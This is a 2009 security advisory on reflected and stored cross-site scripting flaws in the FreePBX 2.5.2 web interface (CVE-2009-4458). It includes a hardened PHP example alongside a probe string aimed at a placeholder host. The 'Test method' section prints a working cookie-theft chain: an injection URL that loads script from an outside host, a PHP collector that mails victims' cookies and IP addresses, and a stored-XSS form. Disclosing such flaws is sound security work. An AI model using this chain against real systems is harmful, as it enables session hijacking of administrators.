FreePBX multiple cross-site scripting and HTML injection vulnerabilities
Published: 2009-12-28
Updated: 2009-12-29
Affected systems:
FreePBX FreePBX 2.5.2
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 37482
CVE(CAN) ID: CVE-2009-4458
FreePBX, formerly known as Asterisk Management Portal, is a standardized implementation of the Asterisk IP telephony toolkit that provides a web configuration interface and other tools.
When display is set to trunks, FreePBX fails to properly sanitize the tech parameter submitted to admin/config.php before returning it to the user, which could allow arbitrary HTML and script code to execute in the user's browser session. In addition, input submitted in the Description field when adding a Zap channel is not properly filtered, which could allow stored cross-site scripting attacks.
<*Source: Global-Evolution
链接:http://secunia.com/advisories/37972/
http://www.exploit-db.com/exploits/10645
*>
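The two defects described above are the same root cause seen twice: a request parameter (tech) and a stored field (the Zap channel Description) reach the HTML page without output encoding. The following PHP is an added example written for this advisory, not FreePBX code; the function names, the assumed whitelist of trunk technology names and the constructed probe string are all assumptions. It shows the vulnerable reflection next to a hardened version that validates the parameter against a whitelist and HTML-encodes both values at render time.

```php
<?php
// Added defensive example, not FreePBX code. Illustrates whitelist validation
// and output encoding for the two fields named in the advisory.

// Assumed set of trunk technology names; adjust to the deployment.
const ALLOWED_TRUNK_TECH = ['sip', 'iax2', 'zap', 'dahdi', 'custom'];

/**
 * Vulnerable pattern: the tech parameter is echoed back unchanged, so a value
 * containing markup is interpreted by the browser.
 */
function render_tech_vulnerable(string $tech): string
{
    return "<h2>Add Trunk ($tech)</h2>";
}

/**
 * Hardened pattern: reject anything outside the whitelist, then HTML-encode
 * the value anyway (defence in depth) before it reaches the page.
 */
function render_tech_hardened(string $tech): string
{
    $tech = strtolower(trim($tech));
    if (!in_array($tech, ALLOWED_TRUNK_TECH, true)) {
        // Unknown technology: do not reflect the supplied value at all.
        return '<p>Invalid trunk technology.</p>';
    }
    $safe = htmlspecialchars($tech, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h2>Add Trunk ($safe)</h2>";
}

/**
 * Stored field: the Zap channel description. Length-limit on input (the form
 * field is size 40) and store the raw text; encoding happens at render time so
 * it is applied consistently wherever the value is displayed.
 */
function sanitize_description_for_storage(string $desc): string
{
    $desc = trim($desc);
    if (mb_strlen($desc, 'UTF-8') > 40) {
        $desc = mb_substr($desc, 0, 40, 'UTF-8');
    }
    return $desc;
}

function render_description(string $storedDesc): string
{
    $safe = htmlspecialchars($storedDesc, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input size="40" type="text" name="description" value="' . $safe . '">';
}

// Constructed probe resembling the shape of the advisory's payload; the host
// is a placeholder (RFC 2606 .invalid TLD), not a real server.
$probe = '</script> "><script src=http://attacker.invalid/x.js></script>';

echo render_tech_vulnerable($probe), "\n";
echo render_tech_hardened($probe), "\n";
echo render_tech_hardened('sip'), "\n";
echo render_description(sanitize_description_for_storage($probe)), "\n";
```

Run under the PHP CLI: the first line shows the probe's markup passing through intact, the second shows the hardened path refusing it, and the last shows the description rendered with `<`, `>` and `"` encoded so the stored text can no longer break out of the value attribute.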
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided only for security research and teaching purposes. Users bear the risk themselves!
location.href='https://www.example.com/admin/admin/config.php?display=trunks&tech=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//global-evolution.info/etc/grep.php%3E%3C/script%3E?nice='+escape(document.cookie)
<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");
$msg = "Cookie: $cookie\nIP Address: $ip\nTime: $Time";
$subject = "cookie";
mail("[email protected]", $subject, $msg);
header ("location: http://127.0.0.1:8080/admin/");
?>
<form name="editZapchandid" action="" method="post" onsubmit="return checkZapchandid(editZapchandid);">
<input type="hidden" name="extdisplay" value="">
<input type="hidden" name="channel" value="">
<input type="hidden" name="action" value="add">
<table><tr><td colspan="2"><h5>Add Channel<hr></h5></td></tr>
<tr><td><a href="#" class="info">Channel:<span>The Zap Channel number to map to a DID</span></a></td>
<td><input size="5" type="text" name="channel" value="" tabindex="1"></td>
</tr><tr><td><a href="#" class="info">Description:<span>A useful description describing this channel</span></a></td>
<td><input size="40" type="text" name="description" value="INSERT 0WN SCRIPTCODE HERE!!!" tabindex="2"></td>
</tr><tr><td><a href="#" class="info">DID:<span>The DID that this channel represents. The incoming call on this channel
will be treated as if it came in with this DID and can be managed with Inbound Routing on DIDs</span></a></td>
<td><input size="40" type="text" name="did" value="" tabindex="3"/></td>
</tr><tr><td colspan="2"><br><input name="Submit" type="submit" value="Submit Changes" tabindex="4">
</td></tr></table></form>
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
FreePBX
-------
The vendor has not yet provided a patch or upgrade; we recommend that users of this software monitor the vendor's homepage for the latest version: